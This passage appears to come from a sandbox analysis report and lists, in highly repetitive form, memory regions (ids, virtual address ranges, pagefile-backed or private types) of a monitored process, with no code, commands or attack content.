0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9892 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9893 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9903 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9906 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9907 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9908 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9911 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9914 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9915 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9916 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9917 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9950 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9951 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9952 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9953 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9954 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9966 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9967 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9968 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9971 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9972 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9990 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9991 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10010 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10011 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10013 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10014 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10015 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10016 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10017 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10018 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10019 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10042 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10043 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10046 start_va = 